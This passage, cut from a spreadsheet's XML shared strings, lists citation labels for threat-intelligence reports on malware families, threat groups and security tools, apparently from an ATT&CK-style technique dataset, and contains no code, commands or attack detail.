Sednit USBStealer 2014),(Citation: Cybereason Cobalt Kitty 2017),(Citation: Malwarebytes DarkComet March 2018),(Citation: CheckPoint Naikon May 2020),(Citation: Talos Konni May 2017),(Citation: ESET Gazer Aug 2017),(Citation: FireEye Know Your Enemy FIN8 Aug 2016),(Citation: Unit 42 Inception November 2018),(Citation: McAfee Honeybee),(Citation: Blasco 2013),(Citation: Talos Zeus Panda Nov 2017),(Citation: Cyphort EvilBunny Dec 2014),(Citation: Check Point Warzone Feb 2020),(Citation: Unit 42 Kazuar May 2017),(Citation: FireEye FIN10 June 2017),(Citation: Unit 42 Bisonal July 2018),(Citation: CERT-EE Gamaredon January 2021),(Citation: FireEye KEGTAP SINGLEMALT October 2020),(Citation: Securelist MuddyWater Oct 2018),(Citation: Cymmetria Patchwork),(Citation: Kaspersky Ferocious Kitten Jun 2021),(Citation: Zscaler Higaisa 2020),(Citation: ESET Turla Mosquito Jan 2018),(Citation: Mandiant UNC3313 Feb 2022),(Citation: McAfee Sharpshooter December 2018),(Citation: Fortinet Agent Tesla April 2018),(Citation: PWC Cloud Hopper Technical Annex April 2017),(Citation: Group IB APT 41 June 2021),(Citation: TrendMicro Tropic Trooper May 2020),(Citation: McAfee Oceansalt Oct 2018),(Citation: Crowdstrike Qakbot October 2020),(Citation: Securelist Kimsuky Sept 2013),(Citation: Palo Alto DNS Requests),(Citation: Symantec Dragonfly),(Citation: GitHub QuasarRAT),(Citation: Antiy CERT Ramsay April 2020),(Citation: Picus Emotet Dec 2018),(Citation: Bitdefender Naikon April 2021),(Citation: Microsoft Holmium June 2020),(Citation: ASERT InnaputRAT April 2018),(Citation: ESET Dukes October 2019),(Citation: GDATA Zeus Panda June 2017),(Citation: Korean FSI TA505 2020),(Citation: ESET GreyEnergy Oct 2018),(Citation: Cofense NanoCore Mar 2018),(Citation: DHS CISA AA22-055A MuddyWater February 2022),(Citation: Gh0stRAT ATT March 2019),(Citation: ClearSky Charming Kitten Dec 2017),(Citation: Novetta Blockbuster),(Citation: CISA AA20-301A Kimsuky),(Citation: DustySky),(Citation: ESET Turla Mosquito May 2018),(Citation: Talos NavRAT May 2018),(Citation: Symantec Backdoor.Mivast),(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020),(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020),(Citation: FireEye APT41 Aug 2019),(Citation: Fortinet Metamorfo Feb 2020),(Citation: Cybereason Chaes Nov 2020),(Citation: Kaspersky MoleRATs April 2019),(Citation: US-CERT Emotet Jul 2018),(Citation: Trend Micro IXESHE 2012),(Citation: ESET BackdoorDiplomacy Jun 2021),(Citation: Unit 42 SeaDuke 2015),(Citation: Anomali Pirate Panda April 2020),(Citation: BlackBerry Amadey 2020),(Citation: Talos MuddyWater May 2019),(Citation: Securelist Machete Aug 2014),(Citation: CIRCL PlugX March 2013),(Citation: IBM IcedID November 2017),(Citation: FOX-IT May 2016 Mofang),(Citation: Sophos Maze VM September 2020),(Citation: Palo Alto OilRig May 2016),(Citation: Cofense Astaroth Sept 2018),(Citation: Trend Micro Muddy Water March 2021),(Citation: Lookout Dark Caracal Jan 2018),(Citation: Proofpoint NETWIRE December 2020),(Citation: FireEye CARBANAK June 2017),(Citation: Group IB GrimAgent July 2021),(Citation: Talent-Jump Clambling February 2020),(Citation: Unit 42 C0d0so0 Jan 2016),(Citation: Securelist Remexi Jan 2019),(Citation: Group IB RTM August 2019),(Citation: Zscaler APT31 Covid-19 October 2020),(Citation: Prevx Carberp March 2011),(Citation: GitHub PowerSploit May 2012),(Citation: McAfee Lazarus Jul 2020),(Citation: Group IB Ransomware September 2020),(Citation: Unit 42 Gorgon Group Aug 2018),(Citation: TrendMicro BKDR_URSNIF.SM),(Citation: SecureList Griffon May 2019),(Citation: ESET InvisiMole June 2020),(Citation: ESET LoJax Sept 2018),(Citation: Symantec Vasport May 2012),(Citation: Forcepoint Monsoon),(Citation: Microsoft SIR Vol 19),(Citation: ESET Trickbot Oct 2020),(Citation: Group IB Silence Sept 2018),(Citation: Fidelis INOCNATION),(Citation: McAfee Lazarus Resurfaces Feb 2018),</t>
  </si>
  <si>
    <t>(Citation: Github PowerShell Empire),(Citation: GitHub PowerSploit May 2012),(Citation: PowerSploit Documentation),(Citation: Deply Mimikatz),(Citation: Graeber 2014),(Citation: Microsoft Configure LSA)</t>
  </si>
  <si>
    <t>(Citation: Palo Alto Reaver Nov 2017),(Citation: Unit42 DarkHydrus Jan 2019),(Citation: ESET GreyEnergy Oct 2018),(Citation: Cybereason Astaroth Feb 2019),(Citation: Palo Alto Comnie),(Citation: Unit 42 DarkHydrus July 2018),(Citation: Talos Micropsia June 2017),(Citation: Baumgartner Naikon 2015),(Citation: NCC Group Team9 June 2020),(Citation: IBM Grandoreiro April 2020),(Citation: Accenture Hogfish April 2018),(Citation: F-Secure BlackEnergy 2014),(Citation: FireEye APT30),(Citation: ClearSky Lazarus Aug 2020),(Citation: Github PowerShell Empire),(Citation: Cybereason Bazar July 2020),(Citation: Talos Konni May 2017),(Citation: Unit 42 SeaDuke 2015),(Citation: ESET Gazer Aug 2017),(Citation: Securelist WhiteBear Aug 2017),(Citation: FireEye APT39 Jan 2019),(Citation: Cofense Astaroth Sept 2018),(Citation: Palo Alto OilRig May 2016),(Citation: Unit 42 Kazuar May 2017),(Citation: Proofpoint Leviathan Oct 2017),(Citation: Cylance Cleaver),(Citation: Kaspersky Ferocious Kitten Jun 2021),(Citation: Cylance Dust Storm),(Citation: ESET Okrum July 2019),(Citation: FireEye Periscope March 2018),(Citation: PWC Cloud Hopper Technical Annex April 2017),(Citation: Unit 42 Gorgon Group Aug 2018),(Citation: ESET InvisiMole June 2020),(Citation: McAfee Lazarus Resurfaces Feb 2018),(Citation: UCF STIG Symbolic Links)</t>
  </si>
  <si>
    <t>,(Citation: Microsoft W32Time May 2017)</t>
  </si>
  <si>
    <t>(Citation: Unit42 Cannon Nov 2018),(Citation: Securelist Remexi Jan 2019),(Citation: ESET Turla Mosquito Jan 2018),(Citation: CitizenLab KeyBoy Nov 2016),(Citation: ESET Gazer Aug 2017),(Citation: Microsoft PLATINUM April 2016),(Citation: PWC KeyBoys Feb 2017),(Citation: TrendMicro Tropic Trooper May 2020),(Citation: Unit 42 Tropic Trooper Nov 2016),(Citation: FireEye KEGTAP SINGLEMALT October 2020),(Citation: Zscaler Bazar September 2020),(Citation: Windows Commands JPCERT),(Citation: NSA MS AppLocker),(Citation: Beechey 2010)</t>
  </si>
  <si>
    <t>(Citation: Red Canary NETWIRE January 2020),(Citation: Fysbis Dr Web Analysis),</t>
  </si>
  <si>
    <t>(Citation: Anomali Rocke March 2019),</t>
  </si>
  <si>
    <t>(Citation: Cybereason Kimsuky November 2020),(Citation: Talos Seduploader Oct 2017),(Citation: ESET Attor Oct 2019),(Citation: Unit 42 Playbook Dec 2017),(Citation: ESET Sednit Part 1),(Citation: ESET Zebrocy Nov 2018),(Citation: Morphisec Cobalt Gang Oct 2018),</t>
  </si>
  <si>
    <t>(Citation: Intezer HiddenWasp Map 2019),(Citation: Objective See Green Lambert for OSX Oct 2021),(Citation: Glitch-Cat Green Lambert ATTCK Oct 2021),(Citation: NCSC Cyclops Blink February 2022),(Citation: objsee mac malware 2017),</t>
  </si>
  <si>
    <t>(Citation: Kaspersky Adwind Feb 2016),</t>
  </si>
  <si>
    <t>(Citation: Cybereason PowerLess February 2022),(Citation: Securelist Dtrack),(Citation: CISA AA20-239A BeagleBoyz August 2020),(Citation: Prevailion DarkWatchman 2021),(Citation: ESET Machete July 2019),(Citation: Securelist Calisto July 2018),(Citation: BiZone Lizar May 2021),(Citation: CyberBit Dtrack),(Citation: Threatpost Lizar May 2021),(Citation: Mandiant UNC3890 Aug 2022),(Citation: Scarlet Mimic Jan 2016),(Citation: Github PowerShell Empire),(Citation: CISA AA20-259A Iran-Based Actor September 2020),(Citation: NCC Group Chimera January 2021),</t>
  </si>
  <si>
    <t>(Citation: Netscout Stolen Pencil Dec 2018),(Citation: Zdnet Kimsuky Dec 2018),(Citation: Intego Shlayer Apr 2018),(Citation: IBM Grandoreiro April 2020),(Citation: MacKeeper Bundlore Apr 2019),(Citation: Malwarebytes Crossrider Apr 2018),(Citation: Technospot Chrome Extensions GP)</t>
  </si>
  <si>
    <t>(Citation: Cyberint Qakbot May 2021),(Citation: Bitdefender Agent Tesla April 2020),(Citation: Juniper IcedID June 2020),(Citation: IBM Grandoreiro April 2020),(Citation: Cybereason Chaes Nov 2020),(Citation: ESET Grandoreiro April 2020),(Citation: Securelist Brazilian Banking Malware July 2020),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: IBM TrickBot Nov 2016),(Citation: Trusteer Carberp October 2010),(Citation: IBM IcedID November 2017),(Citation: Microsoft Totbrick Oct 2017),(Citation: Prevx Carberp March 2011),(Citation: Kaspersky QakBot September 2021),(Citation: TrendMicro BKDR_URSNIF.SM),(Citation: Fidelis TrickBot Oct 2016),(Citation: Trend Micro Trickbot Nov 2018),(Citation: Dell Dridex Oct 2015),(Citation: cobaltstrike manual),</t>
  </si>
  <si>
    <t>(Citation: GitHub PoshC2),(Citation: Kroll Qakbot June 2020),(Citation: ESET Lazarus Jun 2020),(Citation: Chaos Stolen Backdoor),(Citation: ClearSky Lebanese Cedar Jan 2021),(Citation: TrendMicro Pawn Storm 2019),(Citation: CISA AA20-296A Berserk Bear December 2020),(Citation: Aqua Kinsing April 2020),(Citation: CERT-FR PYSA April 2020),(Citation: TrendMicro Pawn Storm Dec 2020),(Citation: FireEye APT34 Webinar Dec 2017),(Citation: DarkReading FireEye FIN5 Oct 2015),(Citation: CME Github September 2018),(Citation: SecureWorks August 2019),(Citation: FireEye APT39 Jan 2019),(Citation: Kaspersky Turla),(Citation: Microsoft Targeting Elections September 2020),(Citation: Securelist DarkVishnya Dec 2018),(Citation: CISA AA20-239A BeagleBoyz August 2020),(Citation: Mandiant FIN5 GrrCON Oct 2016),(Citation: Kaspersky QakBot September 2021),(Citation: ClearSky Pay2Kitten December 2020),(Citation: Crowdstrike Qakbot October 2020),(Citation: NIST 800-63-3)</t>
  </si>
  <si>
    <t>(Citation: Bitdefender Trickbot March 2020),(Citation: ESET Trickbot Oct 2020),(Citation: NCC Group Chimera January 2021),(Citation: NIST 800-63-3)</t>
  </si>
  <si>
    <t>(Citation: APT3 Adversary Emulation Plan),(Citation: FireEye FIN6 April 2016),(Citation: US-CERT TA18-074A),(Citation: McAfee Night Dragon),(Citation: Kali Hydra),(Citation: FireEye APT41 Aug 2019),(Citation: Cylance Cleaver),(Citation: NIST 800-63-3)</t>
  </si>
  <si>
    <t>(Citation: FireEye Periscope March 2018),(Citation: CheckPoint SpeakUp Feb 2019),(Citation: Symantec Emotet Jul 2018),(Citation: Unit42 Xbash Sept 2018),(Citation: ANSSI Sandworm January 2021),(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021),(Citation: CME Github September 2018),(Citation: Secureworks Emotet Nov 2018),(Citation: Malwarebytes Emotet Dec 2017),(Citation: Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020),(Citation: CIS Emotet Dec 2018),(Citation: Unit 42 Lucifer June 2020),(Citation: ESET Hermetic Wizard March 2022),(Citation: Malwarebytes Pony April 2016),(Citation: Trend Micro Xbash Sept 2018),(Citation: US-CERT Emotet Jul 2018),(Citation: NIST 800-63-3)</t>
  </si>
  <si>
    <t>(Citation: Symantec Leafminer July 2018),(Citation: DOJ Iran Indictments March 2018),(Citation: Microsoft Holmium June 2020),(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021),(Citation: Novetta Blockbuster RATs),(Citation: CME Github September 2018),(Citation: Novetta Blockbuster),(Citation: Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020),(Citation: Dragos Crashoverride 2018),(Citation: SecureWorks August 2019),(Citation: Anomali Linux Rabbit 2018),(Citation: GitHub MailSniper),(Citation: Microsoft Targeting Elections September 2020),(Citation: Secure List Bad Rabbit),(Citation: MSTIC Nobelium Oct 2021),(Citation: MSRC Nobelium June 2021),(Citation: FireEye APT33 Guardrail),(Citation: NCC Group Chimera January 2021),(Citation: NIST 800-63-3)</t>
  </si>
  <si>
    <t>,(Citation: Docker Daemon Socket Protect),(Citation: Kubernetes Hardening Guide)</t>
  </si>
  <si>
    <t>(Citation: Kaspersky TajMahal April 2019),(Citation: CheckPoint Volatile Cedar March 2015),(Citation: Trend Micro DRBControl February 2020),(Citation: GDATA Zeus Panda June 2017),(Citation: Korean FSI TA505 2020),(Citation: Riskiq Remcos Jan 2018),(Citation: Cybereason Astaroth Feb 2019),(Citation: Volexity InkySquid RokRAT August 2021),(Citation: F-Secure Cosmicduke),(Citation: ESET Casbaneiro Oct 2019),(Citation: Bitdefender Agent Tesla April 2020),(Citation: Unit 42 VERMIN Jan 2018),(Citation: Talos Agent Tesla Oct 2018),(Citation: IBM Grandoreiro April 2020),(Citation: Symantec Catchamas April 2018),(Citation: McAfee Gold Dragon),(Citation: Fortinet Metamorfo Feb 2020),(Citation: objsee mac malware 2017),(Citation: Symantec Chafer February 2018),(Citation: Github PowerShell Empire),(Citation: Unit42 Redaman January 2019),(Citation: Securelist Brazilian Banking Malware July 2020),(Citation: Talos Konni May 2017),(Citation: Malwarebytes DarkComet March 2018),(Citation: Github Koadic),(Citation: ESET Machete July 2019),(Citation: Kaspersky Adwind Feb 2016),(Citation: Securelist Machete Aug 2014),(Citation: ESET RTM Feb 2017),(Citation: Palo Alto OilRig May 2016),(Citation: Unit 42 Playbook Dec 2017),(Citation: FireEye APT38 Oct 2018),(Citation: FoxIT Wocao December 2019),(Citation: Kaspersky Ferocious Kitten Jun 2021),(Citation: Cylance Cleaver),(Citation: Talent-Jump Clambling February 2020),(Citation: Securelist Remexi Jan 2019),(Citation: Fortinet Agent Tesla April 2018),(Citation: Fortinet Agent Tesla June 2017),(Citation: ESET Attor Oct 2019),(Citation: Symantec Chafer Dec 2015),</t>
  </si>
  <si>
    <t>(Citation: AADInternals Documentation),(Citation: Roadtools),</t>
  </si>
  <si>
    <t>(Citation: Peirates GitHub),</t>
  </si>
  <si>
    <t>(Citation: QiAnXin APT-C-36 Feb2019),(Citation: CheckPoint SpeakUp Feb 2019),(Citation: Proofpoint TA505 October 2019),(Citation: Flashpoint FIN 7 March 2019),(Citation: Talos PoetRAT October 2020),(Citation: GDATA Zeus Panda June 2017),(Citation: OilRig ISMAgent July 2017),(Citation: NCC Group Fivehands June 2021),(Citation: Volexity InkySquid RokRAT August 2021),(Citation: ESET Sednit Part 2),(Citation: Symantec Whitefly March 2019),(Citation: ESET Operation Spalax Jan 2021),(Citation: FireEye FIN6 Apr 2019),(Citation: Github PowerShell Empire),(Citation: Securelist Brazilian Banking Malware July 2020),(Citation: Cybereason Cobalt Kitty 2017),(Citation: FireEye APT34 Dec 2017),(Citation: Unit 42 OopsIE! Feb 2018),(Citation: FireEye FIN6 April 2016),(Citation: ESET ForSSHe December 2018),(Citation: Malwarebytes DarkComet March 2018),(Citation: Donut Github),(Citation: NCC Group APT15 Alive and Strong),(Citation: FireEye APT39 Jan 2019),(Citation: Mandiant Operation Ke3chang November 2014),(Citation: FireEye FiveHands April 2021),(Citation: Unit 42 QUADAGENT July 2018),(Citation: Unit42 OilRig Nov 2018),(Citation: CheckPoint Bandook Nov 2020),(Citation: ClearSky Wilted Tulip July 2017),(Citation: FireEye FIN7 Aug 2018),(Citation: US-CERT TA18-074A),(Citation: Citizen Lab Stealth Falcon May 2016),(Citation: Mandiant FIN5 GrrCON Oct 2016),(Citation: FireEye APT19),(Citation: ANSSI Sandworm January 2021),(Citation: FireEye APT37 Feb 2018),(Citation: ClearSky Pay2Kitten December 2020),(Citation: FBI FLASH APT39 September 2020),(Citation: Crowdstrike DNC June 2016),(Citation: Nccgroup Gh0st April 2018),(Citation: FireEye Hacking Team),(Citation: win10_asr),(Citation: Netspi PowerShell Execution Policy Bypass)</t>
  </si>
  <si>
    <t>(Citation: MacKeeper Bundlore Apr 2019),(Citation: wardle evilquest parti),(Citation: objsee mac malware 2017),(Citation: SentinelLabs reversing run-only applescripts 2021),(Citation: applescript signing)</t>
  </si>
  <si>
    <t>(Citation: Flashpoint FIN 7 March 2019),(Citation: ESET EvilNum July 2020),(Citation: VirusBulletin Kimsuky October 2019),(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ),(Citation: DHS CISA AA22-055A MuddyWater February 2022),(Citation: MSTIC Nobelium Toolset May 2021),(Citation: Malwarebytes Higaisa 2020),(Citation: Cybereason Valak May 2020),(Citation: Proofpoint TA505 June 2018),(Citation: ClearSky MuddyWater Nov 2018),(Citation: Medium Metamorfo Apr 2020),(Citation: Malwarebytes Kimsuky June 2021),(Citation: CISA AA20-301A Kimsuky),(Citation: Symantec Leafminer July 2018),(Citation: Talos Cobalt Strike September 2020),(Citation: Malwarebytes Konni Aug 2021),(Citation: Group IB Cobalt Aug 2017),(Citation: Talos Cobalt Group July 2018),(Citation: Cybereason Chaes Nov 2020),(Citation: TrendMicro EarthLusca 2022),(Citation: Unit 42 Cobalt Gang Oct 2018),(Citation: Rewterz Sidewinder COVID-19 June 2020),(Citation: CrowdStrike Carbon Spider August 2021),(Citation: Trend Micro FIN6 October 2019),(Citation: Kaspersky MoleRATs April 2019),(Citation: Cyber Forensicator Silence Jan 2019),(Citation: Securelist Brazilian Banking Malware July 2020),(Citation: Cybereason Cobalt Kitty 2017),(Citation: Donut Github),(Citation: Prevailion DarkWatchman 2021),(Citation: fsecure NanHaiShu July 2016),(Citation: Secureworks GOLD KINGSWOOD September 2018),(Citation: Kaspersky Adwind Feb 2016),(Citation: TrendMicro Cobalt Group Nov 2017),(Citation: ATT Sidewinder January 2021),(Citation: Hornet Security Avaddon June 2020),(Citation: PTSecurity Cobalt Group Aug 2017),(Citation: MacKeeper Bundlore Apr 2019),(Citation: Cofense Astaroth Sept 2018),(Citation: PTSecurity Higaisa 2020),(Citation: Proofpoint TA505 Sep 2017),(Citation: Cylance Dust Storm),(Citation: Morphisec Cobalt Gang Oct 2018),(Citation: Volexity Ocean Lotus November 2020),(Citation: Zscaler Higaisa 2020),(Citation: ESET Turla Mosquito Jan 2018),(Citation: FireEye FIN7 Aug 2018),(Citation: Awake Security Avaddon),(Citation: Kaspersky QakBot September 2021),(Citation: MalwareBytes LazyScripter Feb 2021),(Citation: Unit42 Xbash Sept 2018),(Citation: FireEye MuddyWater Mar 2018),(Citation: SecureList Griffon May 2019),(Citation: ESET InvisiMole June 2020),(Citation: DFIR Conti Bazar Nov 2021),(Citation: Symantec WastedLocker June 2020),(Citation: win10_asr)</t>
  </si>
  <si>
    <t>,(Citation: Cisco IOS Software Integrity Assurance - TACACS),(Citation: Cisco IOS Software Integrity Assurance - AAA)</t>
  </si>
  <si>
    <t>(Citation: Red Canary Hospital Thwarted Ryuk October 2020),(Citation: TrendMicro POWERSTATS V3 June 2019),(Citation: ATT TeamTNT Chimaera September 2020),(Citation: Dragos Crashoverride 2018),(Citation: KISA Operation Muzabi),(Citation: PTSecurity Cobalt Dec 2016),(Citation: ESET T3 Threat Report 2021),(Citation: Symantec Cicada November 2020),(Citation: Accenture MUDCARP March 2019),(Citation: Cobalt Strike TTPs Dec 2017),(Citation: Cybereason Molerats Dec 2020),(Citation: Unit 42 MuddyWater Nov 2017),(Citation: Cybereason Valak May 2020),(Citation: Trend Micro njRAT 2018),(Citation: Unit 42 DarkHydrus July 2018),(Citation: ClearSky MuddyWater Nov 2018),(Citation: Kaspersky APT Trends Q1 April 2021),(Citation: CobaltStrike Daddy May 2017),(Citation: Carbon Black Emotet Apr 2019),(Citation: PWC KeyBoys Feb 2017),(Citation: Lazarus RATANKBA),(Citation: Trend Micro TA505 June 2019),(Citation: AADInternals Documentation),(Citation: Intel 471 REvil March 2020),(Citation: TrendMicro EarthLusca 2022),(Citation: MuddyWater TrendMicro June 2018),(Citation: Carbon Black JCry May 2019),(Citation: Crowdstrike Indrik November 2018),(Citation: Talos Konni May 2017),(Citation: FireEye APT33 Guardrail),(Citation: Volexity SolarWinds),(Citation: Symantec Seaduke 2015),(Citation: CISA WellMess July 2020),(Citation: Sophos Netwalker May 2020),(Citation: Trend Micro Emotet Jan 2019),(Citation: GitHub SILENTTRINITY Modules July 2019),(Citation: TrendMicro Confucius APT Aug 2021),(Citation: PTSecurity Cobalt Group Aug 2017),(Citation: Unit 42 Playbook Dec 2017),(Citation: RedCanary Mockingbird May 2020),(Citation: Volexity Exchange Marauder March 2021),(Citation: FireEye Periscope March 2018),(Citation: PowerSploit Documentation),(Citation: US-CERT TA18-074A),(Citation: RATANKBA),(Citation: CrowdStrike Grim Spider May 2019),(Citation: CrowdStrike StellarParticle January 2022),(Citation: MalwareBytes LazyScripter Feb 2021),(Citation: Talos MuddyWater Jan 2022),(Citation: Symantec WastedLocker June 2020),(Citation: Intrinsec Egregor Nov 2020),(Citation: FireEye Hancitor),(Citation: Proofpoint TA459 April 2017),(Citation: Trustwave Pillowmint June 2020),(Citation: Cycraft Chimera April 2020),(Citation: Talos Promethium June 2020),(Citation: Cybereason Oceanlotus May 2017),(Citation: Tetra Defense Sodinokibi March 2020),(Citation: Deep Instinct TA505 Apr 2019),(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ),(Citation: FireEye NETWIRE March 2019),(Citation: Mandiant No Easy Breach),(Citation: Symantec Dragonfly Sept 2017),(Citation: GitHub Pupy),(Citation: Cisco Ukraine Wipers January 2022),(Citation: Crowdstrike Helix Kitten Nov 2018),(Citation: Reaqta MuddyWater November 2017),(Citation: Cybereason PowerLess February 2022),(Citation: Cybereason Soft Cell June 2019),(Citation: Malwarebytes Kimsuky June 2021),(Citation: Symantec Emotet Jul 2018),(Citation: Malwarebytes Konni Aug 2021),(Citation: FireEye POSHSPY April 2017),(Citation: PWC WellMess July 2020),(Citation: FireEye APT35 2018),(Citation: Kaspersky WIRTE November 2021),(Citation: Github PowerShell Empire),(Citation: Cisco DNSMessenger March 2017),(Citation: CERT-FR PYSA April 2020),(Citation: CrowdStrike BloodHound April 2018),(Citation: FireEye APT29 Nov 2018),(Citation: TrendMicro Pawn Storm Dec 2020),(Citation: TrendMicro MacOS April 2018),(Citation: Secureworks BRONZE BUTLER Oct 2017),(Citation: FireEye FIN6 April 2016),(Citation: CME Github September 2018),(Citation: Symantec Elfin Mar 2019),(Citation: Unit 42 Magic Hound Feb 2017),(Citation: ProofPoint SettingContent-ms July 2018),(Citation: FireEye SMOKEDHAM June 2021),(Citation: Proofpoint Leviathan Oct 2017),(Citation: Microsoft POLONIUM June 2022),(Citation: FoxIT Wocao December 2019),(Citation: ClearSky Wilted Tulip July 2017),(Citation: TrendMicro Patchwork Dec 2017),(Citation: ESET Exchange Mar 2021),(Citation: Citizen Lab Stealth Falcon May 2016),(Citation: BlackBerry CostaRicto November 2020),(Citation: BiZone Lizar May 2021),(Citation: FireEye APT41 March 2020),(Citation: FireEye MuddyWater Mar 2018),(Citation: Crowdstrike MUSTANG PANDA June 2018),(Citation: Kaspersky Cloud Atlas December 2014),(Citation: Check Point APT35 CharmPower January 2022),(Citation: cobaltstrike manual),(Citation: FireEye APT29),(Citation: Talos Frankenstein June 2019),(Citation: Talos Sodinokibi April 2019),(Citation: FireEye FIN7 April 2017),(Citation: Talos Lokibot Jan 2021),(Citation: FireEye Operation Double Tap),(Citation: Bromium Ursnif Mar 2017),(Citation: Unit42 DarkHydrus Jan 2019),(Citation: US District Court Indictment GRU Unit 74455 October 2020),(Citation: Cofense RevengeRAT Feb 2019),(Citation: Trend Micro DRBControl February 2020),(Citation: ESET Turla PowerShell May 2019),(Citation: Morphisec ShellTea June 2019),(Citation: Palo Alto Sofacy 06-2018),(Citation: CrowdStrike AQUATIC PANDA December 2021),(Citation: Medium S2W WhisperGate January 2022),(Citation: Symantec MuddyWater Dec 2018),(Citation: FireEye TEMP.Veles 2018),(Citation: Microsoft Analyzing Solorigate Dec 2020),(Citation: FireEye APT32 May 2017),(Citation: Red Canary Emotet Feb 2019),(Citation: Check Point Meteor Aug 2021),(Citation: TrendMicro Netwalker May 2020),(Citation: DFIR Report APT35 ProxyShell March 2022),(Citation: OilRig New Delivery Oct 2017),(Citation: Lab52 WIRTE Apr 2019),(Citation: NCC Group Team9 June 2020),(Citation: Anomali Static Kitten February 2021),(Citation: Group IB Cobalt Aug 2017),(Citation: BleepingComputer Molerats Dec 2020),(Citation: Talos Kimsuky Nov 2021),(Citation: Checkpoint MosesStaff Nov 2021),(Citation: Symantec Chafer February 2018),(Citation: CrowdStrike Carbon Spider August 2021),(Citation: Symantec Thrip June 2018),(Citation: Cyber Forensicator Silence Jan 2019),(Citation: Unit 42 WhisperGate January 2022),(Citation: Cybereason Cobalt Kitty 2017),(Citation: ESET Nomadic Octopus 2018),(Citation: FireEye Know Your Enemy FIN8 Aug 2016),(Citation: Unit 42 Inception November 2018),(Citation: FireEye APT34 Dec 2017),(Citation: Medium Ali Salem Bumblebee April 2022),(Citation: CISA ComRAT Oct 2020),(Citation: Prevailion DarkWatchman 2021),(Citation: Bitdefender FIN8 July 2021),(Citation: ATT Sidewinder January 2021),(Citation: Uptycs Warzone UAC Bypass November 2020),(Citation: Check Point Warzone Feb 2020),(Citation: Talos Zeus Panda Nov 2017),(Citation: Symantec Waterbug Jun 2019),(Citation: Kaspersky Poseidon Group),(Citation: FireEye FIN10 June 2017),(Citation: Securelist DarkVishnya Dec 2018),(Citation: NCSC Joint Report Public Tools),(Citation: RiskIQ Cobalt Jan 2018),(Citation: CISA AA20-259A Iran-Based Actor September 2020),(Citation: Google TAG Lazarus Jan 2021),(Citation: Securelist MuddyWater Oct 2018),(Citation: Cymmetria Patchwork),(Citation: Proofpoint TA505 Sep 2017),(Citation: CISA AA20-239A BeagleBoyz August 2020),(Citation: FireEye KEGTAP SINGLEMALT October 2020),(Citation: CheckPoint Bandook Nov 2020),(Citation: CrowdStrike Wizard Spider October 2020),(Citation: ESET Turla Mosquito Jan 2018),(Citation: FireEye FIN7 March 2017),(Citation: EST Kimsuky April 2019),(Citation: PWC Cloud Hopper Technical Annex April 2017),(Citation: FireEye TRITON 2019),(Citation: FireEye APT19),(Citation: FireEye Obfuscation June 2017),(Citation: Picus Emotet Dec 2018),(Citation: Cybereason Kimsuky November 2020),(Citation: Cybereason TA505 April 2019),(Citation: Flashpoint FIN 7 March 2019),(Citation: CISA AA21-200A APT40 July 2021),(Citation: Microsoft Holmium June 2020),(Citation: Morphisec FIN7 June 2017),(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021),(Citation: McAfee Cuba April 2021),(Citation: ESET Dukes October 2019),(Citation: BitDefender Chafer May 2020),(Citation: DHS CISA AA22-055A MuddyWater February 2022),(Citation: Korean FSI TA505 2020),(Citation: ClearSky Charming Kitten Dec 2017),(Citation: ESET Lazarus Jun 2020),(Citation: ESET ComRAT May 2020),(Citation: Bitdefender Trickbot VNC module Whitepaper 2021),(Citation: SecureWorks BRONZE UNION June 2017),(Citation: Anomali MUSTANG PANDA October 2019),(Citation: Talos Cobalt Strike September 2020),(Citation: CISA AA20-301A Kimsuky),(Citation: Kaspersky Lyceum October 2021),(Citation: ESET Turla Mosquito May 2018),(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020),(Citation: FireEye APT41 Aug 2019),(Citation: Talos Cobalt Group July 2018),(Citation: ZScaler Squirrelwaffle Sep 2021),(Citation: Microsoft HAFNIUM March 2020),(Citation: FBI Flash FIN7 USB),(Citation: FireEye FIN6 Apr 2019),(Citation: Kaspersky MoleRATs April 2019),(Citation: Secureworks IRON HEMLOCK Profile),(Citation: Microsoft Actinium February 2022),(Citation: Palo Alto OilRig Sep 2018),(Citation: Donut Github),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: Group IB Ransomware May 2020),(Citation: TrendMicro Cobalt Group Nov 2017),(Citation: Talos MuddyWater May 2019),(Citation: SecureWorks August 2019),(Citation: Palo Alto OilRig May 2016),(Citation: Trend Micro Muddy Water March 2021),(Citation: Unit 42 QUADAGENT July 2018),(Citation: Netskope Squirrelwaffle Oct 2021),(Citation: Cyberreason Anchor December 2019),(Citation: Visa FIN6 Feb 2019),(Citation: Unit42 Xbash Sept 2018),(Citation: Group IB Ransomware September 2020),(Citation: GitHub PowerSploit May 2012),(Citation: Alperovitch 2014),(Citation: Unit 42 Gorgon Group Aug 2018),(Citation: SecureList Griffon May 2019),(Citation: Secureworks GandCrab and REvil September 2019),(Citation: Symantec Gallmaker Oct 2018),(Citation: Forcepoint Monsoon),(Citation: Group IB Silence Sept 2018),(Citation: NCC Group Chimera January 2021),(Citation: Netspi PowerShell Execution Policy Bypass)</t>
  </si>
  <si>
    <t>(Citation: synack 2016 review),(Citation: Google Election Threats October 2020),(Citation: CheckPoint SpeakUp Feb 2019),(Citation: Unit 42 MechaFlounder March 2019),(Citation: ESET Dukes October 2019),(Citation: BitDefender Chafer May 2020),(Citation: GitHub Pupy),(Citation: Morphisec ShellTea June 2019),(Citation: 360 Machete Sep 2020),(Citation: KISA Operation Muzabi),(Citation: Riskiq Remcos Jan 2018),(Citation: Cobalt Strike TTPs Dec 2017),(Citation: GitHub SILENTTRINITY March 2022),(Citation: Cylance Machete Mar 2017),(Citation: Volexity InkySquid RokRAT August 2021),(Citation: Cybereason Molerats Dec 2020),(Citation: Talos Cobalt Strike September 2020),(Citation: CISA AA20-301A Kimsuky),(Citation: CobaltStrike Daddy May 2017),(Citation: CoinTicker 2019),(Citation: Talos PoetRAT April 2020),(Citation: Cybereason Chaes Nov 2020),(Citation: TrendMicro EarthLusca 2022),(Citation: Checkpoint MosesStaff Nov 2021),(Citation: Trend Micro Tick November 2019),(Citation: CERT-FR PYSA 